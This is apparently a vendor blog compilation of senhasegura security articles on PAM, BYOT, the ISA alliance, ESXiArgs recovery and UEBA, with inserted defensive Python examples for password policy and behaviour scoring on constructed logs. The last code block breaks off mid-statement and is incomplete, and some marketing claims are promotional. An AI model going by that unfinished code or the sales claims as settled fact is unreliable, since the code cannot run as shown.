
[Product Information] Senhasegura: the enterprise 360° all-round PAM management platform

Privileged Access Management (PAM) is a cybersecurity strategy focused on controlling and protecting the accounts in an IT environment that hold elevated access rights. These accounts carry special privileges and, if compromised, can cause serious damage to an organization.


Why is PAM important?
Cyberattacks frequently target privileged accounts, giving attackers unrestricted access to confidential data and critical systems. The senhasegura PAM solution helps mitigate these risks in the following ways:

  1. Strict access control: the senhasegura PAM solution determines who may access an account, when, and for what purpose
  2. Monitoring and auditing: account activity is monitored and recorded to detect suspicious behavior
  3. Credential protection: credentials are stored securely and encrypted
  4. Proxied access: access to accounts can be brokered through senhasegura, which records every user action for later audit
  5. Command control: specific commands can be blocked during proxied access, preventing harmful operations from being executed


A security-first solution that will redefine your identity security principles
senhasegura's revolutionary innovations effectively prevent privileged attacks, making it the industry's most comprehensive solution for protecting human and machine identities. It is affordable and complete, ensuring quality protection for your organization's critical assets while providing unparalleled customer support. It includes:

  1. Secure privileged access: PAM Core manages privileged accounts professionally through centralized control, detailed access restrictions, supervision of user activity and in-depth audit trails
  2. Secure remote work: Domum Remote Access securely connects remote users to internal systems, manages fine-grained access control, monitors user sessions and applies multi-factor authentication
  3. DevOps secrets management: DevOps Secret Manager protects sensitive data through access control, automatic secret rotation, integration with existing DevOps tools, and comprehensive reporting and analytics
  4. Certificate management: Certificate Manager centralizes and automates certificate management, monitors certificate status and works with certificate authorities
  5. Endpoint and device protection: Endpoint Manager enforces the principle of least privilege by supervising application usage, assigning specific privileges, managing credentials and providing comprehensive reporting and analytics
  6. Personal password manager: MySafe stores user credentials securely in an encrypted vault, generates strong passwords, logs in automatically and facilitates secure information sharing
  7. Cloud identity and access management: Cloud IAM simplifies identity management through multi-factor authentication, role-based controls, audit trails and detailed reporting, and compatibility with current identity providers
  8. Cloud entitlements and infrastructure management: Cloud Entitlements simplifies entitlement management through role-based controls, continuous risk monitoring, seamless integration with cloud providers and easily reported audit trails


At the core of Senhasegura's success is its 360° Privilege Platform, a powerful and user-friendly solution designed to secure privileged users and machines. Industry analysts such as Gartner, KuppingerCole and ITRG consistently recognize Senhasegura as a PAM leader because the platform is highly effective at protecting sensitive data, reducing risk and ensuring compliance. Notably, Senhasegura also has the fastest time to value (TTV) and the lowest cost of ownership in the PAM industry, making it an attractive choice for organizations seeking comprehensive privileged access security.


[Senhasegura / Privileged Account Management Solution] https://version-2.com.tw/senhasegura/#products&domum
✽ You are welcome to call the Version 2 Taiwan professional security team at (02) 7722-6899

About Segura®
Segura® is committed to ensuring that enterprises retain sovereignty over their privileged operations and information. To this end, we prevent data theft by tracing administrators' actions on networks, servers, databases and a multitude of devices. We also help enterprises meet audit requirements and the most demanding standards, including PCI DSS, Sarbanes-Oxley, ISO 27001 and HIPAA.

About Version 2 Digital
Professional distributor and leader in security solutions
Version 2 Taiwan is one of the most dynamic IT companies in Asia. With many years in the IT field, it is dedicated to providing up-to-date security solutions (such as EDR, NDR and vulnerability management), tool products (such as remote control and web filtering) and managed threat detection and response services (MDR). Through an extensive network of points of sale, resellers and partners, it offers products that are highly acclaimed in the market together with customized, localized professional services.

Version 2 Taiwan's sales coverage includes Taiwan, Hong Kong, mainland China, Singapore and Macau. Its customers span every industry, including Global 1000 multinationals, listed companies, public utilities, government departments, countless successful SMEs and consumer-market customers from cities across Asia.

What Is Bring Your Own Technology and How Is It Implemented?


Bring Your Own Technology (BYOT) is a practice adopted by companies that allow employees to use their own personal devices at work.

The adoption of this concept favors professionals, who use devices with which they are familiar, and companies, which invest less in technological devices. To learn more, read our text to the end!

Bring Your Own Technology (BYOT) started among executives who had access to cutting-edge technology useful to their work.

Over time, other professionals have begun to use their own mobile devices in the companies in which they work, which benefits companies and employees themselves.

On the other hand, ensuring information security in a context where employees access corporate data directly from their tablets, smartphones, and other electronic devices is challenging. With that in mind, we prepared this article on the subject. Here you will see:

1. What Is Bring Your Own Technology?

2. What Is the Importance of BYOT For a Company and Its Employees?

3. Does BYOT Have Disadvantages?

4. What Is a BYOT Example?

5. What Is the Difference Between BYOT and BYOD?

6. How to Ensure the Security of External Devices?

7. About senhasegura

8. Conclusion

Enjoy the read!

1. What Is Bring Your Own Technology?

Bring Your Own Technology (BYOT) is an increasingly common practice in the corporate environment, where employees of a company choose and purchase their devices.

This concept refers especially to mobile devices, such as tablets, laptops, and smartphones, and refers to the integration between these devices and users, as well as the expectation of people to have their devices customized and not chosen by the organization in which they work.

Bring Your Own Technology (BYOT) can also be understood as Bring Your Own Device (BYOD).

2. What Is the Importance of BYOT For a Company and Its Employees?

As we have mentioned in the introduction to this article, BYOT favors the company and the employees themselves. This is because most professionals prefer to use the devices with which they are familiar, becoming much more productive.

Moreover, encouraging Bring Your Own Technology allows companies to save money by reducing investments in their own equipment.

3. Does BYOT Have Disadvantages?

Organizations that adhere to BYOT need to be more attentive to information security. This is because their employees can access malicious files, making their devices more vulnerable to leaks of sensitive information, and these devices do not always comply with the company’s trust standards or are evaluated by the IT department.

In addition to the lack of security related to BYOT, professionals can take more work home, compromising their time off and getting overwhelmed.

4. What Is a BYOT Example?

BYOT refers to devices, such as tablets, computers, laptops, and smartphones, belonging to professionals and used in corporate contexts, internal or external to the company.

5. What Is the Difference Between BYOT and BYOD?

As we have mentioned in this article, BYOD is a concept that means “Bring Your Own Device.” That is, the term refers to the practice of authorizing company employees to work using their own devices.

This concept has three variations: BYOT, BYOP, and BYOPC. The first stands for Bring Your Own Technology, the second for Bring Your Own Phone, and BYOPC for Bring Your Own PC.

6. How to Ensure the Security of External Devices?

The main practices that can optimize security in the context of Bring Your Own Technology are:

  • Establish a password policy;
  • Ensure the privacy of company data;
  • Limit the use of the devices; and
  • Learn how to proceed in case of dismissals.

Check out each of these practices more closely:

  • Establish a password policy

Using strong passwords is an efficient way to prevent data breaches. Thus, companies that have adopted BYOT must require their employees to create secure passwords, guided by the following good practices:

  • Opt for long passwords, preferably with 14 characters or more;
  • Create a full combination of characters, which gathers numbers, upper and lower case letters, and symbols;
  • Avoid words easily found in dictionaries, in addition to names of companies, products, and people;
  • Do not reuse previously used passwords;
  • Do not use words written backward as a password; and
  • If possible, use a password vault, so you do not have to memorize several complex passwords.
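
The rules above, apart from the vault recommendation, can be enforced mechanically. The following Python is an added example (not senhasegura code) that turns the list into a policy check; the dictionary words, the blocked company/product/people names and the store of previous password hashes are constructed for illustration.

```python
"""Password policy check following the BYOT guidance listed above.

Added example, not senhasegura code. The dictionary words, blocked company/
product/people names and the store of previous password hashes are
constructed for illustration; a deployment would load its own lists.
"""
import hashlib
import string

MIN_LENGTH = 14  # "14 characters or more"

# Constructed blocklists: common dictionary words plus company, product and people names.
DICTIONARY_WORDS = {"password", "welcome", "summer", "dragon", "letmein"}
BLOCKED_NAMES = {"senhasegura", "version2", "mysafe", "domum", "alice", "bob"}


def password_hash(pw: str) -> str:
    """Hash used to remember previous passwords without storing them.

    SHA-256 keeps the example short; a real history store should use a slow,
    salted password hash (bcrypt, scrypt or Argon2).
    """
    return hashlib.sha256(pw.encode("utf-8")).hexdigest()


def check_password(pw: str, previous_hashes: set) -> list:
    """Return every policy violation found; an empty list means the password passes."""
    problems = []

    # Rule: long passwords, preferably 14 characters or more.
    if len(pw) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")

    # Rule: a full combination of digits, upper case, lower case and symbols.
    has_all_classes = (
        any(c.isdigit() for c in pw)
        and any(c.isupper() for c in pw)
        and any(c.islower() for c in pw)
        and any(c in string.punctuation for c in pw)
    )
    if not has_all_classes:
        problems.append("must mix digits, upper case, lower case and symbols")

    # Rule: no dictionary words or company/product/people names, forwards or backwards.
    low = pw.lower()
    for word in sorted(DICTIONARY_WORDS | BLOCKED_NAMES):
        if word in low:
            problems.append(f"contains blocked word '{word}'")
        elif word[::-1] in low:  # the "written backwards" rule
            problems.append(f"contains blocked word written backwards ('{word}')")

    # Rule: do not reuse previously used passwords (compared by hash only).
    if password_hash(pw) in previous_hashes:
        problems.append("reuses a previous password")

    return problems


if __name__ == "__main__":
    history = {password_hash("Tr0ub4dor&3-Xk9#pQ2m")}  # constructed prior password
    for candidate in ("Tr0ub4dor&3-Xk9#pQ2m", "Drowssap!12345678", "SenhaSegura2024!!"):
        print(candidate, "->", check_password(candidate, history) or "OK")
```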

  • Ensure the privacy of company data

It is important to make it clear to employees that the company’s data belongs only to the organization, in addition to presenting a privacy policy and showing what will be the consequences in the event of confidential information leaks.

  • Limit the use of the devices

Although the devices belong to employees, their use should be restricted in the corporate environment. In this sense, they should avoid using certain resources when in the organization’s network.

  • Learn how to proceed in case of dismissals

There must be a security protocol in case of the dismissal of employees. Ideally, the data on the employee’s device should be deleted/blocked as soon as possible to ensure this information does not reach the wrong people.

7. About senhasegura

We are from senhasegura, an organization specializing in cybersecurity, whose main purpose is to guarantee the digital sovereignty of the companies that hire us, providing control over actions and privileged data and avoiding unauthorized access and leaks of confidential data.

To achieve this goal, we follow the lifecycle of privileged access management through machine automation, before, during, and after accesses.

Moreover, we work to avoid disruptions to companies’ operations, which can impact their performance; we automatically verify the use of privileges; and we bring organizations into compliance with audit criteria and standards such as HIPAA, PCI DSS, ISO 27001, and Sarbanes-Oxley.

8. Conclusion

In this article, you saw that:

  • Bring Your Own Technology is an increasingly common practice in corporate IT, where employees from a company bring their own technologies to work.
  • This practice is welcomed by employees, who use devices which they are used to, and by companies, which have access to technology and at the same time reduce costs with the acquisition of equipment;
  • On the other hand, the use of personal devices at work increases vulnerability to cyber threats, since not all devices comply with company security standards;
  • BYOT refers to devices such as tablets, computers, laptops, and smartphones;
  • This concept has three variations: BYOT, BYOP, and BYOPC.
  • To ensure the security of external devices, it is essential to establish a password policy, ensure the privacy of company data, limit the use of devices, and have a security protocol in case of dismissals.

 

About Segura®
Segura® strives to ensure the sovereignty of companies over actions and privileged information. To this end, we work against data theft through traceability of administrator actions on networks, servers, databases and a multitude of devices. In addition, we pursue compliance with auditing requirements and the most demanding standards, including PCI DSS, Sarbanes-Oxley, ISO 27001 and HIPAA.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

senhasegura Joins the ISA Global Cybersecurity Alliance

The topic of cyber threats is becoming increasingly present on the agendas of organizations of all sizes and verticals. With the intensification of the digital transformation movement through the introduction of technologies such as 5G and the Internet of Things, ensuring the protection of infrastructure will be an even greater challenge for organizational leaders.

One of the preferred targets of malicious attackers is organizations that use Industrial Control Systems (ICS). ICS process critical data and are responsible for the functioning of sectors such as telecommunications, logistics, energy generation, and healthcare. These sectors are a vital part of countries’ economies, forming part of what we call critical infrastructure. According to a Kaspersky study, during the second half of 2021, almost 40% of industrial devices were targeted at least once. These attacks bring significant consequences not only for these organizations but for society as a whole.

One of the biggest examples of the damage that attacks on this type of organization bring occurred in 2017. That year, Maersk, a logistics giant, fell victim to the NotPetya malware, a virus with high propagation and destruction capacity that encrypted its data. The attack caused infected devices to simply stop working, affecting the continuity of its operations and bringing revenue losses.

In addition, various governments around the world have shown concern about the impact associated with cybersecurity, especially those linked to critical infrastructure. This has caused an increase in the activity of regulating how companies implement appropriate cybersecurity controls in industrial environments.

As part of the effort to ensure the cybersecurity of control and automation systems, the International Society of Automation (ISA) developed the 62443 series of standards. These standards are internationally recognized and have been adopted by the International Electrotechnical Commission and the United Nations. The ISA 62443 standards define requirements and procedures for implementing secure industrial and automation systems, as well as best security practices for these systems. Adopting the ISA 62443 standards allows industrial organizations to address the cybersecurity challenges of their systems and close the gaps between operations and Information Technology in their infrastructure.

Moreover, with the aim of increasing awareness and protection capability of ICS in industrial and critical infrastructure installations and processes, ISA created the Global Cybersecurity Alliance (GCA). The cybersecurity alliance created by ISA brings together automation and system control providers, IT infrastructure suppliers, service providers, system integrators, and end-users to address threats to ICS together.

ISAGCA also works to stimulate the adoption of the ISA 62443 standards, which allows for increased awareness, knowledge sharing, and tool development to assist organizations in implementing the entire cybersecurity protection lifecycle. ISAGCA members are also committed to working together with government agencies, regulators, and other stakeholders around the world.

ISAGCA members include leading technology and industrial application providers, among which is Senhasegura. senhasegura’s participation in ISAGCA since its foundation allows for the application of our experience in protecting privileged access to achieve the alliance’s objectives, especially those related to ICS protection. senhasegura’s participation in the alliance also allows for identifying gaps, reducing risks, and ensuring that member companies have the appropriate tools to protect their infrastructure from malicious attacks.

All of these aspects also show the commitment of the entire senhasegura team and ISA to the effective security of industrial environments, as well as the importance of advancing together to ensure the application of these standards, methods, and best practices for the protection of industrial systems. In this way, it is possible to ensure not only the security of organizations but of society as a whole.


CISA and FBI Release ESXiArgs Ransomware Recovery Script

The US Cyber Security and Infrastructure Agency (CISA) and the Federal Bureau of Investigation (FBI) released this week a recovery guide for the ESXiArgs ransomware, which has harmed thousands of companies globally.

This was because malicious attackers were allegedly taking advantage of known vulnerabilities in unpatched, out-of-service or outdated versions of VMware ESXi software. Through these “loopholes” they would be deploying ESXiArgs ransomware on ESX servers, rendering these devices unusable.

The recovery tool can be found at this link and has been used by numerous corporations, who managed to recover encrypted items without paying a ransom to attackers.

However, CISA warns that to use this resource, it is essential to understand how it works. In this sense, companies harmed by ESXiArgs should evaluate the recommendations present in the README file, which comes with the script.

The number of servers infected by ESXiArgs across several countries has already exceeded 3,000. According to the victims, in order to decrypt the data, the hackers requested about 2 Bitcoins, equivalent to approximately US$ 22,800 (at the time of writing).

In addition, malicious attackers would have demanded payment of the ransom within three days, as a condition for not disclosing the organizations’ sensitive data.

According to Rapid7, ESXiArgs attempted to shut down virtual machines by killing the process in the virtual machine’s kernel that handles I/O commands; in some cases this was unsuccessful, which is why those organizations were able to recover their data.

The recovery script developed by CISA in conjunction with the FBI is based on the work of researchers Enes Sonmez and Ahmet Aykac, and shows how victims can rebuild virtual machine metadata from disks that the malware was unable to encrypt.

In practice, the function of the script is to create new configuration files that allow access to the VMs and not delete encrypted files. However, CISA makes no guarantees that the script is secure.

VMware recommends that companies implement the patch released in 2021 for the vulnerability exploited by ESXiArgs. Organizations that do not fix the flaw should temporarily disable the ESXi Service Location Protocol (SLP) or, failing that, keep port 427 disabled.


How User and Entity Behavior Analytics Helps Cybersecurity

Cyberattacks are increasingly sophisticated, making traditional digital security tools insufficient to protect organizations from malicious actors.

In 2015, Gartner defined a category of solutions called User and Entity Behavior Analytics (UEBA).
Its big advantage is monitoring suspicious behaviors of human users and devices in corporate networks through algorithms and machine learning, determining if there are threats and issuing alerts to security teams.

In this article, we explain more about this subject, which is extremely important for the security of your company. To facilitate your reading, we divided our text into the following topics:

  • What Is User and Entity Behavior Analytics?
  • How Does UEBA Work?
  • What Are Its Three Pillars?
  • What Are the Benefits of UEBA?
  • Disadvantages of User and Entity Behavior Analytics
  • Best Practices for User and Entity Behavior Analytics
  • What Is the Difference Between SIEM and UEBA?
  • UEBA X NTA
  • What Is UBA and What Is It For?
  • What Is the Difference Between UBA and UEBA?
  • senhasegura UEBA Solution
  • About senhasegura
  • Conclusion

Enjoy the read!

What Is User and Entity Behavior Analytics?

User and Entity Behavior Analytics (UEBA) is a digital security feature that uses algorithms and machine learning to identify abnormal behaviors in users, routers, servers, and endpoints of a network.

In practice, this technology allows alerting IT administrators about anomalies and automatically disconnecting users with unusual behavior from the network, as it monitors human and machine behavior.

With this, it helps detect people and equipment that could compromise an organization’s system, strengthening its digital security and sovereignty.

How Does UEBA Work?

To ensure the effectiveness of User and Entity Behavior Analytics, it is necessary to implement this feature in the organization’s infrastructure, which can be targeted by malicious attackers.

Moreover, many corporations ask their employees to install this solution on their home routers to avoid risks. This is because the professional may have to access the corporate network using their own router, generating security vulnerabilities.

It is very simple to understand how UEBA works. Let’s imagine an unauthorized user steals an employee’s credentials and accesses the network. This does not make them capable of imitating this employee’s usual behavior.

Therefore, UEBA issues alerts, which reveal suspicious behavior to IT administrators. A UEBA solution has three essential elements. They are analytics, integration, and presentation.

Analytics collects and organizes data about the behavior of human users and entities to determine what should be considered normal. Through this system, profiles are created of how each user behaves when accessing the network. Thus, one can develop models that allow the identification of suspicious behavior.

With the growth and evolution of corporations, it becomes necessary to integrate UEBA into other security systems. Through proper integration, UEBA solutions compare information collected from different sources, which optimizes the system.

Finally, the presentation involves how User and Entity Behavior Analytics responds to abnormal behaviors. It depends on what is defined by the company.

Some UEBA systems are configured to simply create an alert, suggesting an investigation for IT administrators. Others are configured to perform additional actions, such as disconnecting an employee with abnormal behavior.
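
To make the three elements concrete, here is an added example (not senhasegura code and not part of the original article) in Python: analytics builds alice's baseline of normal hours, hosts and actions from history; integration normalizes two differently formatted log sources into one schema; and presentation maps a risk score to the response the company configured, either alert only or disconnect. The log lines, scoring weights and thresholds are constructed for illustration.

```python
"""UEBA-style baseline, risk scoring and response (added example, not senhasegura code).

Analytics: build a per-user profile of normal hours, hosts and actions.
Integration: normalize events from two constructed log sources into one schema.
Presentation: map the risk score to the response the company configured.
Log lines, weights and thresholds below are constructed for illustration.
"""
import re
from collections import Counter, defaultdict

# Constructed history from two sources with different layouts: a VPN gateway
# (ISO timestamp, src=) and a PAM session proxy (space-separated timestamp, target=/cmd=).
HISTORY = """\
2024-03-01T08:55:10 vpn user=alice src=10.0.5.21 result=ok
2024-03-02T09:02:44 vpn user=alice src=10.0.5.21 result=ok
2024-03-03T08:48:03 vpn user=alice src=10.0.5.22 result=ok
2024-03-01 09:10:01 PAM session user=alice target=db-prod-01 cmd=SELECT
2024-03-02 09:15:37 PAM session user=alice target=db-prod-01 cmd=SELECT
2024-03-03 09:05:12 PAM session user=alice target=db-prod-02 cmd=SELECT
""".splitlines()

KV = re.compile(r"(\w+)=(\S+)")
TIME = re.compile(r"(\d{2}):\d{2}:\d{2}")


def normalize(line: str) -> dict:
    """Integration: reduce a line from either source to user/hour/host/action."""
    kv = dict(KV.findall(line))
    return {
        "user": kv["user"],
        "hour": int(TIME.search(line).group(1)),
        "host": kv.get("target") or kv.get("src"),
        "action": kv.get("cmd", "login"),  # VPN lines carry no command
    }


def build_profile(events: list) -> dict:
    """Analytics: summarise what 'normal' looks like for one user."""
    profile = {"hours": Counter(), "hosts": set(), "actions": set()}
    for e in events:
        profile["hours"][e["hour"]] += 1
        profile["hosts"].add(e["host"])
        profile["actions"].add(e["action"])
    return profile


# Constructed weights: an unknown host counts more than an odd hour or a new action.
WEIGHTS = {"unusual hour": 2, "unknown host": 3, "unseen action": 2}


def risk_score(profile: dict, event: dict) -> tuple:
    """Score how far an event deviates from the profile; returns (score, reasons).

    A user with no history has an empty profile and therefore scores every factor.
    """
    reasons = []
    # Hours adjacent to an observed hour are tolerated as normal drift.
    if all(abs(event["hour"] - h) > 1 for h in profile["hours"]):
        reasons.append("unusual hour")
    if event["host"] not in profile["hosts"]:
        reasons.append("unknown host")
    if event["action"] not in profile["actions"]:
        reasons.append("unseen action")
    return sum(WEIGHTS[r] for r in reasons), reasons


# Constructed thresholds; a company that only wants alerts makes 'disconnect' unreachable.
ALERT_AND_DISCONNECT = {"alert": 3, "disconnect": 5}
ALERT_ONLY = {"alert": 3, "disconnect": float("inf")}


def respond(score: int, policy: dict) -> str:
    """Presentation: choose the configured response for a score."""
    if score >= policy["disconnect"]:
        return "disconnect"
    if score >= policy["alert"]:
        return "alert"
    return "allow"


def evaluate(history: list, new_line: str, policy: dict = ALERT_AND_DISCONNECT) -> dict:
    """Profile the event's user from history, score the event, and decide the response."""
    per_user = defaultdict(list)
    for line in history:
        e = normalize(line)
        per_user[e["user"]].append(e)
    event = normalize(new_line)
    score, reasons = risk_score(build_profile(per_user[event["user"]]), event)
    return {"user": event["user"], "score": score, "reasons": reasons,
            "response": respond(score, policy)}


if __name__ == "__main__":
    # A login that matches alice's baseline, then two sessions that deviate from it
    # (the stolen-credential scenario described above).
    for line in (
        "2024-03-04T09:01:22 vpn user=alice src=10.0.5.21 result=ok",
        "2024-03-04 03:17:45 PAM session user=alice target=db-prod-01 cmd=DROP",
        "2024-03-04 03:22:09 PAM session user=alice target=hr-db-09 cmd=mysqldump",
    ):
        print(evaluate(HISTORY, line))
```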

What Are Its Three Pillars?

According to Gartner, a UEBA solution has three pillars:

  • Use cases;
  • Data sources; and
  • Analytical methods.

Use cases refer to the behavior of human or machine users reported by User and Entity Behavior Analytics, which monitors, identifies, and alerts about anomalies. Unlike systems that perform specialized analysis, UEBA technology needs to be relevant to different use cases.

When we talk about data sources, we refer to repositories of information that feed into UEBA, since User and Entity Behavior Analytics does not collect data directly from IT environments.

Analytical methods are what enable UEBA to identify abnormal behavior. They include threat signatures, statistical models, rules, and machine learning.

What Are the Benefits of UEBA?

Traditional security solutions have proven ineffective at protecting corporations from sophisticated cyberattacks, which has boosted the rise of User and Entity Behavior Analytics, as it allows one to identify even the smallest of unusual behaviors.
Its main benefits include:

Broad Approach to Cyberattacks

In addition to monitoring the behavior of human users, UEBA monitors devices such as endpoints, servers, and routers, which are often targeted by malicious attackers.

Thus, User and Entity Behavior Analytics detects a wide variety of cyberattacks, including insider threats, compromised accounts, brute force attacks, and DDoS.

Operational Efficiency

With the use of artificial intelligence and machine learning, UEBA solutions can replace the workforce of IT employees, which represents a benefit for corporations and security teams.

Nevertheless, User and Entity Behavior Analytics does not generate a drastic reduction in IT staff, especially in larger organizations, due to the complexity of security requirements, which require skilled people to configure systems and guide employees.

These professionals may also be responsible for investigating abnormal behaviors if the company decides to investigate them before taking measures.

In addition, IT analysts can develop other projects, working strategically for business growth.

Cost Reduction

With the reduction of the IT team, an organization consequently reduces costs. Also, by detecting abnormal behavior and preventing cyberattacks, companies avoid the losses caused by interrupted activities.
They also avoid having their customers’ and employees’ data exposed, which could result in fines due to data protection laws.

Risk Reduction

With professionals connected to corporate networks, including in a home environment, vulnerabilities caused by cyber threats increase gradually, making protection solutions in silos insufficient.

For IT teams, it is impossible to manually monitor all devices in use. Hence the perks of UEBA solutions.
It is worth mentioning that UEBA resources are not limited to ensuring information security. They also enable compliance with security standards for regulated industries, avoiding problems that could lead to lawsuits and fines for companies, as previously mentioned.

Disadvantages of User and Entity Behavior Analytics

The UEBA solutions also have some negative aspects. The first one is its high price, which can make this technology inaccessible to small and medium-sized businesses.

Another disadvantage of User and Entity Behavior Analytics is the slow deployment. Although many vendors claim this system can be deployed in a short time, Gartner customers say that in simple use cases, it can take three to six months, and in complex situations, it can take up to 18 months.

In addition, the view UEBA offers over network behaviors is restricted as its logs are enabled on a small part of a corporation’s network.

It is also important to keep in mind UEBA needs third-party logs to work. Failures in the generation of these logs impact its function.

Best Practices for User and Entity Behavior Analytics

User and Entity Behavior Analytics is designed to identify abnormal behaviors of humans and machines.
However, this solution should not be used in isolation but associated with other monitoring systems, in order to improve the digital security of an organization. Other best practices for companies using UEBA resources are:

  • Avoiding false alerts and overloading of generated data, taking advantage of big data resources, and using machine learning and statistical analysis;
  • Creating security policies taking into account insider and external threats;
  • Ensuring that only information security professionals receive alerts from UEBA; and
  • Not underestimating the risks posed by unprivileged user accounts, as hackers can increase privileges to gain access to sensitive systems.

What Is the Difference Between SIEM and UEBA?

Like UEBA, Security Information and Event Management (SIEM) offers tools that improve information security by distinguishing normal patterns from suspicious behaviors.

The notable difference is that User and Entity Behavior Analytics uses data from human and machine user behavior to define what is normal.

Because SIEM is rule-based, malicious actors can circumvent these guidelines to attack a corporation. Also, SIEM detects threats that happen in real-time, but it is inefficient to prevent sophisticated attacks performed over months or years.

UEBA, on the other hand, is not based on rules, but on risk-scoring techniques and algorithms, which make it possible to detect abnormal behavior over a much longer period.

UEBA X NTA

Like UEBA, Network Traffic Analysis (NTA) solutions are based on machine learning, advanced analytics, and security rules, and monitor user behavior on corporate networks. They also detect suspicious actions and threats.

However, this technology has other advantages. One is to allow companies to visualize everything that happens on their network, including in the context of a cyberattack. NTA also makes it possible to build profiles of the network and its devices, and it is easy to deploy.

We emphasize these two solutions should be used in a complementary way, since NTA alone does not track local events, nor detect advanced security problems.

What Is UBA and What Is It For?

User Behavior Analytics (UBA) is a technology that allows one to identify unusual or abnormal behaviors, detect intrusions, and minimize their consequences.

Through UBA solutions, one can discover an invasion promoted by cybercriminals or find out if an employee is misusing the data to which they have access.

The focus of User Behavior Analytics is on user analytics, their accounts, and identity, not machine behavior.

What Is the Difference Between UBA and UEBA?

The difference between UBA and UEBA is that, in the first case, we refer to a solution that monitors human users to detect any anomalies in their behavior.

The extra “e” in UEBA extends monitoring to machine entities such as routers, servers, endpoints, and devices in general.

The acronym was updated in 2017 by Gartner to show that in addition to tracking human users, it is essential to identify threats related to devices and applications.

senhasegura UEBA Solution

senhasegura has a UEBA solution embedded in its PAM security platform, which allows one to monitor the behavior of human and machine users automatically.

This technology features a self-learning mechanism to identify and respond to changes in users’ behavior patterns and access profiles.

Some of the main characteristics are:

  • Analysis of user session based on behavioral history;
  • Identification of accesses and check of suspects by a series of criteria;
  • Identification of unusual behavior with abnormality alerts for SIEM/SYSLOG;
  • Detailed dashboards with a visual representation of incidents and threats, which allow a security team to act quickly;
  • Algorithms are continuously adjusted to user behavior.

Its benefits include:

  • Restriction of privilege abuse;
  • Fast detection of attacks and compromised accounts;
  • Control over the user’s administrative actions;
  • Automatic response to suspected credential theft.

About senhasegura

We, from senhasegura, are part of the group of information security companies MT4 Tecnologia, founded in 2001, and we aim to provide digital sovereignty to our customers through the control of privileged actions and data.

With this, we prevent data leaks and theft, as we manage privileged permissions before, during, and after access through machine automation. We work to:

  • Optimize the performance of companies, avoiding interruption of operations;
  • Perform automatic audits on the use of permissions;
  • Audit privileged changes to detect abuse of privilege automatically;
  • Provide advanced solutions with the PAM Security Platform;
  • Reduce cyber threats; and
  • Bring the organizations that hire us into compliance with audit requirements and standards such as PCI DSS, Sarbanes-Oxley, ISO 27001, and HIPAA.

Conclusion

In this article, you saw that:

  • User and Entity Behavior Analytics uses algorithms and machine learning to identify abnormal behaviors in users, whether they are humans or machine entities;
  • This solution allows alerting IT administrators about anomalies and automatically disconnecting users with unusual network behavior;
  • To ensure the effectiveness of User and Entity Behavior Analytics, it is necessary to install this feature on the organization’s and employees’ devices;
  • A UEBA solution has three essential elements. They are analytics, integration, and presentation;
  • According to Gartner, a UEBA solution also has three pillars: the use cases, the data sources, and the analytical methods;
  • The benefits of UEBA include: a broad approach to cyberattacks, reduction of human labor, cost reduction, and risk reduction;
  • Among its negative aspects, the high price and slow deployment stand out;
  • The creation of security policies that take into account insider and external threats is among the best practices in the use of UEBA solutions;
  • It is also recommended to consider the risks presented by users without privileges;
  • SIEM differs from UEBA in that it is primarily rule-based and correlates events as they occur, whereas UEBA builds behavioral baselines over time and flags deviations from them;
  • NTA allows organizations to view all the activities that occur on their network, including in the context of a cyberattack, and enables the creation of profiles of the network and its devices, with easy deployment;
  • The difference between UBA and UEBA is that the first provides for the monitoring of human users and, in the second case, it is extended to machines.
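The summary above says UEBA learns what is normal for each user or machine and alerts on deviations. As an added example, not code from the original article or from any senhasegura product, the block below shows the smallest useful version of that idea: a per-user baseline of login hour and data volume kept with Welford's running mean/variance (so the baseline keeps adjusting as benign events arrive, as the feature list says), plus the set of hosts the user has been seen on. The training and live events are constructed for the demo, and the 3-sigma alert threshold is an assumption.

```python
"""Added example (not from the original article or any senhasegura product):
a minimal UEBA-style baseline.  Each user's usual login hour and data volume
are tracked with running mean/variance (Welford's algorithm) and the set of
source hosts seen; new events are scored against that baseline.
All events below are constructed for the demo."""
from __future__ import annotations

import math
from dataclasses import dataclass, field

# Constructed training events: (user, hour_of_day, source_host, bytes_transferred)
TRAINING_EVENTS = [
    ("alice", 9, "ws-alice", 2_000), ("alice", 10, "ws-alice", 3_500),
    ("alice", 9, "ws-alice", 2_800), ("alice", 11, "ws-alice", 3_100),
    ("alice", 8, "ws-alice", 2_200), ("alice", 10, "ws-alice", 2_900),
    ("svc-backup", 2, "bkp01", 900_000), ("svc-backup", 2, "bkp01", 910_000),
    ("svc-backup", 3, "bkp01", 905_000), ("svc-backup", 2, "bkp01", 898_000),
]

ALERT_THRESHOLD = 3.0  # assumption: a combined score of 3 sigma or more raises an alert


@dataclass
class Baseline:
    """Per-user running statistics; update() is Welford's online mean/variance."""
    n: int = 0
    mean_hour: float = 0.0
    m2_hour: float = 0.0
    mean_bytes: float = 0.0
    m2_bytes: float = 0.0
    hosts: set[str] = field(default_factory=set)

    def update(self, hour: int, host: str, nbytes: int) -> None:
        self.n += 1
        d = hour - self.mean_hour
        self.mean_hour += d / self.n
        self.m2_hour += d * (hour - self.mean_hour)
        d = nbytes - self.mean_bytes
        self.mean_bytes += d / self.n
        self.m2_bytes += d * (nbytes - self.mean_bytes)
        self.hosts.add(host)

    def _std(self, m2: float) -> float:
        return math.sqrt(m2 / (self.n - 1)) if self.n > 1 else 0.0

    def score(self, hour: int, host: str, nbytes: int) -> tuple[float, list[str]]:
        """Return (anomaly score, human-readable reasons) for one new event."""
        score, reasons = 0.0, []
        # Hour of day: floor the std at 1 hour so a very regular user is not over-sensitive.
        std_h = max(self._std(self.m2_hour), 1.0)
        z_h = abs(hour - self.mean_hour) / std_h
        if z_h > 3:
            reasons.append(f"login hour {hour} is {z_h:.1f} sigma from the usual {self.mean_hour:.1f}")
            score += z_h
        # Data volume: only unusually *large* transfers matter (possible exfiltration).
        std_b = max(self._std(self.m2_bytes), 0.1 * self.mean_bytes, 1.0)
        z_b = (nbytes - self.mean_bytes) / std_b
        if z_b > 3:
            reasons.append(f"transferred {nbytes} bytes, {z_b:.1f} sigma above the usual {self.mean_bytes:.0f}")
            score += z_b
        if host not in self.hosts:
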